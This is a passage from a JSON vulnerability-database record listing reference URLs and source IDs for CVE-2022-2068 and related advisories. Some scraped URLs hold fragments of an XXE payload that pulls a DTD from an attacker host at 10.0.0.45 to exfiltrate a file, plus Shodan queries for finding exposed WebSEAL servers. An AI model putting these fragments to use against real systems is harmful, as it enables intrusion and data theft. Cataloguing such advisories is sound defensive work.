        "url": "https://access.redhat.com/security/cve/cve-2021-43813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27782"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0670"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/5.2/html-single/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/1548993"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0670"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-25314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-40528"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2789521"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21673"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21673"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-25313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29824"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6024"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/openssl"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0759"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32250"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21698"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1012"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0759"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6051"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21698"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:0408"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30632"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30698"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30629"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23772"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28131"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0391"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29526"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0256"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30633"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23773"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30630"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24795"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1962"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30635"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3787"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25309"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30699"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25310"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32148"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1798"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-0308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-20107"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8913"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=5.7"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8841"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-40303"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-31813"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42915"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28615"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22721"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-35252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28614"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28330"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26377"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-40304"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23943"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-6457-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nodejs/12.22.9~dfsg-1ubuntu3.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0778"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36516"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24448"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8889"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21618"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21628"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0617"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0924"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0562"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0908"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0865"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26373"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-20368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1048"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3640"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0561"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0617"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-39399"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0562"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0854"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29581"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1016"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2078"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22844"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2938"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21499"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-36946"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42003"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0865"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36558"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0909"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0561"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0854"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0168"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21626"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28390"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36558"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27950"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2586"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23960"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3640"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-30002"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1184"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25255"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42004"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1355"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36516"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28893"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/advisories/2024-ibmsecurity.txt"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/oauth/oauth20/authorize?client_id=testauthenticatorclient\u0026response_type=code\u0026scope=mmfaauthn\""
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/2001/xmlschema\""
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jbeder/yaml-cpp/pull/807."
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/client9/libinjection/issues/124."
      },
      {
        "trust": 0.1,
        "url": "https://dsc-02.test.lan:8443/"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416#issuecomment-2032110397."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-30997"
      },
      {
        "trust": 0.1,
        "url": "https://www.digicert.com,"
      },
      {
        "trust": 0.1,
        "url": "https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html`."
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/?x=%file`,"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/`)."
      },
      {
        "trust": 0.1,
        "url": "https://internet-faced-website/mga/sps/mmfa/user/mgmt/details"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=testauthenticatorclient\u0026code=0nxkrywnfzkcoa5wftzqdk5mkjpv9y`"
      },
      {
        "trust": 0.1,
        "url": "https://127.0.0.1:$port"
      },
      {
        "trust": 0.1,
        "url": "http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/soap-env:body\u003e\u003c/soap-env:envelope\u003e\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7106586"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38370"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7155356:"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b,"
      },
      {
        "trust": 0.1,
        "url": "https://www.zlib.org)"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime,"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-31006"
      },
      {
        "trust": 0.1,
        "url": "https://info.domain.tld/mga/sps/authsvc?policyid=urn:ibm:security:authentication:asf:qrcode_response\""
      },
      {
        "trust": 0.1,
        "url": "https://repo.symas.com/repo/rpm/sofl/rhel8"
      },
      {
        "trust": 0.1,
        "url": "https://enroll-url/mga/sps/mmfa/user/mgmt/details`"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-31004"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.shodan.io/search?query=cp%3d%22non+cur+otpi+our+nor+uni%22,"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/ssprek_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/."
      },
      {
        "trust": 0.1,
        "url": "https://www.shodan.io/search?query=http.favicon.hash%3a-2069014068,"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/2001/xmlschema-instance\"\u003e\u003csoap-env:body\u003e\u003cns1:ping"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7158790:"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7106586:"
      },
      {
        "trust": 0.1,
        "url": "http://mirror.centos.org/centos/8-stream/appstream/x86_64/os"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-32329"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38267"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org),"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jbeder/yaml-cpp/pull/807"
      },
      {
        "trust": 0.1,
        "url": "https://info.domain.tld/scim/me\","
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/2001/x"
      },
      {
        "trust": 0.1,
        "url": "http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e\u0026xxe;\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/soap-env:body\u003e\u003c/soap-env:envelope\u003e\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430."
      },
      {
        "trust": 0.1,
        "url": "https://dsc.test.lan:8443/dsess/services/dsess"
      },
      {
        "trust": 0.1,
        "url": "https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=testauthenticatorclient\u0026code=0nxkrywnfzkcoa5wftzqdk5mkjpv9y"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-30998"
      },
      {
        "trust": 0.1,
        "url": "https://dsc-02.test.lan:8443"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/2001/xmlschema-instance\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://repo.symas.com/repo/gpg/rpm-gpg-key-symas-com-signing-key"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7106586,"
      },
      {
        "trust": 0.1,
        "url": "https://repo.symas.com/configs/sofl/rhel8/sofl.repo"
      },
      {
        "trust": 0.1,
        "url": "http://www.chambersign.org,o=ac"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html`."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38368"
      },
      {
        "trust": 0.1,
        "url": "https://xerces.apache.org/xerces-c/secadv.html)."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-31001"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access"
      },
      {
        "trust": 0.1,
        "url": "https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33\u0026arch=x86_64"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jbeder/yaml-cpp."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7145400:"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-31005"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-32328"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38371),"
      },
      {
        "trust": 0.1,
        "url": "http://mirror.centos.org/centos/8-stream/appstream/x86_64/os/packages/"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/spiderlabs/modsecurity/issues/1412)"
      },
      {
        "trust": 0.1,
        "url": "https://info.domain.tld/scim/me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:mmfa:transaction:transactionspending,urn:ietf:params:scim:schemas:extension:isam:1.0:mmfa:transaction:attributespending\","
      },
      {
        "trust": 0.1,
        "url": "http://schemas.xmlsoap.org/soap/envelope/\""
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/?x=%file;\u0027\u003e\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://repo.symas.com/configs/sofl/rhel8/sofl.repo`:"
      },
      {
        "trust": 0.1,
        "url": "https://dsc-02.test.lan:8443/dsess/services/dsess"
      },
      {
        "trust": 0.1,
        "url": "https://mirrors.fedoraproject.org/metalink?repo=fedora-33\u0026arch=x86_64"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416"
      },
      {
        "trust": 0.1,
        "url": "https://url/sps/mga/user/mgmt/html/device/device_selection.html`"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-32330"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mga/user/mgmt/grant"
      },
      {
        "trust": 0.1,
        "url": "https://curl.haxx.se/docs/sslcerts.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7145400"
      },
      {
        "trust": 0.1,
        "url": "http://mirror.centos.org/centos/8-stream/baseos/x86_64/os"
      },
      {
        "trust": 0.1,
        "url": "https://www.digicert.com,o=digicert"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/6989653."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;"
      },
      {
        "trust": 0.1,
        "url": "http://sms.am.tivoli.com\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1410277"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7155356"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5818)."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications"
      },
      {
        "trust": 0.1,
        "url": "https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en)"
      },
      {
        "trust": 0.1,
        "url": "https://www.shodan.io/search?query=webseal,"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7145400."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7155356."
      },
      {
        "trust": 0.1,
        "url": "https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/dtd.xml\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/dtd.xml`,"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.7,"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38369"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416)."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7147932."
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mga/user/mgmt/otp/totp"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7145828."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7158790"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/cvenew)"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mmfa/user/mgmt/authenticators"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      },
      {
        "db": "PACKETSTORM",
        "id": "168022"
      },
      {
        "db": "PACKETSTORM",
        "id": "169396"
      },
      {
        "db": "PACKETSTORM",
        "id": "168112"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170196"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "175432"
      },
      {
        "db": "PACKETSTORM",
        "id": "170179"
      },
      {
        "db": "PACKETSTORM",
        "id": "182466"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168022",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "169396",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168112",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170741",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170196",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170165",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "175432",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170179",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "182466",
        "ident": null
